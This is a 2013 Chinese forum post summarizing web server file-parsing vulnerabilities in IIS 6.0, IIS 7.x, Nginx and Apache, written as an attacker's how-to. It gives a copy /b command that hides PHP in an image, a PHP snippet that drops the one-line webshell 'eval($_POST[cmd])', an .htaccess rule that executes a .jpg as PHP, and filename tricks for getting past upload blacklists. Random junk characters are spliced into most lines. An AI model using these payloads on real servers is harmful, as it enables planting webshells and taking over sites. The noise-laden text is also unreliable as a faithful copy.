找回密码
 立即注册
查看: 3518|回复: 0
打印 上一主题 下一主题

常见服务器解析漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:14:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Author : laterain
2 |( \, R" u+ W2 o/ }; i[+]IIS6.0
$ [; t! {/ ]* X4 ^ ( G3 E6 b/ s. ]! ~
目录解析:/xx.asp/xx.jpg
: y! r" o0 g" j) \0 z# C8 e& f xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码+ D: p4 ]: E7 }% P1 ~+ s' b
IIS6.0 会将 xx.jpg 解析为 asp 文件。+ j! j$ i  [, |; a* }
后缀解析:/xx.asp;.jpg     
6 E2 W2 l% {3 C) o IIS6.0 都会把此类后缀文件成功解析为 asp 文件。6 B: e) ^- o, r1 E( B
默认解析:/xx.asa
: Y8 ~3 r# W3 D         /xx.cer
" ]* h6 [5 h. Y$ @         /xx.cdx) e, x" A, V2 u7 ]  L
IIS6.0 默认的可执行文件除了 asp 还包含这三种& N% k7 G! H! z, o/ L5 f5 a/ V2 o
此处可联系利用目录解析漏洞
) c2 ~, l5 t/ t0 V4 p& r/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
' X: x: K9 {7 D& v) p[+]IIS 7.0/IIS 7.5/Nginx <0.8.038 B7 g) ?5 t9 Z6 h6 U* `8 q

- D8 A0 [* Z# U) t IIS 7.0/IIS 7.5/Nginx <0.8.03
3 c1 i# v2 M: m8 h& P$ N 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面2 |; ?* }: g3 z
加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。) l7 M: x: P" f) Z5 ^# t
常用利用方法:
5 r( S5 h& y3 B' A* T0 c: d 将一张图和一个写入后门代码的文本文件合并将恶意文本
$ |8 `9 ?5 N2 _9 m 写入图片的二进制代码之后,避免破坏图片文件头和尾
9 u8 }& r+ G! ?- B 如:
8 S* b1 i! C0 p" T, ^8 U% K copy xx.jpg /b + yy.txt/a xy.jpg
( J- X  c' @% W0 i# ]# }. K) r #########################################################5 K3 ~% p5 |( a4 e/ Q9 j
/b 即二进制[binary]模式
$ Q3 V3 K& `! m+ \4 h /a 即ascii模式
# ^4 N! e2 N* D# U3 D' s% s6 N: g: M xx.jpg 正常图片文件. x3 u: z( ?7 U* L
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
5 _$ g* I2 y# _ '<?php eval($_POST[cmd])?>');?>
0 @5 g+ m% d" F 意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称7 F# a- H4 Q& m- t9 |5 R* e+ ?
为shell.php的文件; D( b" R9 D. _2 J
###########################################################
8 w( s6 \; k6 ~7 A% \" i# w* f) y 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php
- G% g/ I% o9 R+ j 即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
$ m1 u' h0 ^! \9 I3 D 密码 cmd7 @' h) B: c1 J7 j3 B
[+]Nginx <0.8.03& f5 Z0 {' v5 }2 w2 K; k2 N
) s5 \( o  H, _/ m) k
在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞' U/ d0 Q4 j9 Z1 R# n$ E& w
在一个文件路径(/xx.jpg)后面加上%00.php
" P" b6 K+ i* }. S& J$ p1 @ 会将 /xx.jpg%00.php 解析为 php 文件。
# y' d. P/ j! F4 G[+]Apache<0.8.03
  M! H% \3 `/ ?: u7 j$ |: U 0 ?8 o0 Z3 a# D/ t1 K" z0 g
后缀解析:test.php.x1.x2.x3
! d4 ]/ I6 T* _8 n Apache将从右至左开始判断后缀,若x3非可识别后缀,
8 J' G5 F. g. B8 H2 ^0 E# n; i 再判断x2,直到找到可识别后缀为止,然后将该可识别1 _) b, L, U9 D- ^
后缀进解析test.php.x1.x2.x3 则会被解析为php% j; ]& L4 b- o  U% G* \7 j
经验之谈:php|php3|phtml 多可被Apache解析。' ?3 [+ p0 l3 o3 ], V' [/ R% f) ^
[+]其他一些可利用的/ V& \9 ]' u/ C- T/ {

* i/ i+ @, u& g$ O1 h在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的) E) O* R" Z. w4 S5 @7 k" Z8 ?) h% J
若这样命名,windows会默认除去空格或点,这也是可以被利用的!
, d1 [/ a* `, o7 `在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格
& ~/ V8 x' K6 Q2 V7 I/ ~或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可0 v+ L* h. o' }5 u$ ?
得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
- i7 ^0 N- b/ u, n. K% ^{Linux主机中不行,Linux允许这类文件存在}
. F" X) V' {/ s! Q+ J$ U: I如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说
; N* W  a( Y: F, \  W的,当初我并不知道),且可以被上传,那可以尝试在5 n3 \# }  k  D' x
.htaccess中写入:
; s. R& ]5 E3 n7 h* L3 b" c<FilesMatch “shell.jpg”>   x7 W! @+ Q# V4 {
SetHandler application/x-httpd-php
0 I0 ~- d2 O" }( K3 d</FilesMatch>
/ a; Z) q! j6 `  Q. {! f5 O: kshell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件: X" y1 G/ c# ^! }/ R: ~& W
[+]错误修改
5 M9 X" K  q' j4 x" J 7 H) d7 h" F" W3 ~: B, f; O, d* S
在 IIS 6.0 下可解析 /xx.asp:.jpg% ]0 Q- |# X7 p+ u& j  E- ~9 ~
{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去
. a- j. `: B& R9 I; t剩下/xx.asp}修改:
9 p+ s0 c/ G4 h" r- j; a先谢谢核攻击的提醒
0 N9 }  o' N9 m# {当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp
6 F! N5 B. z1 [- M# G& F) r0 s' k里是没有任何内容的,因为。。不好解释 大家自己看
: M4 \' M" \7 @. Mhttp://lcx.cc/?i=2448! Y9 Q& o% I+ S" L. _! S5 `$ X: M
http://baike.baidu.com/view/3619593.htm- x8 d9 m+ I, r8 x
, ]! ^" u4 V# R- J) k8 m; I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表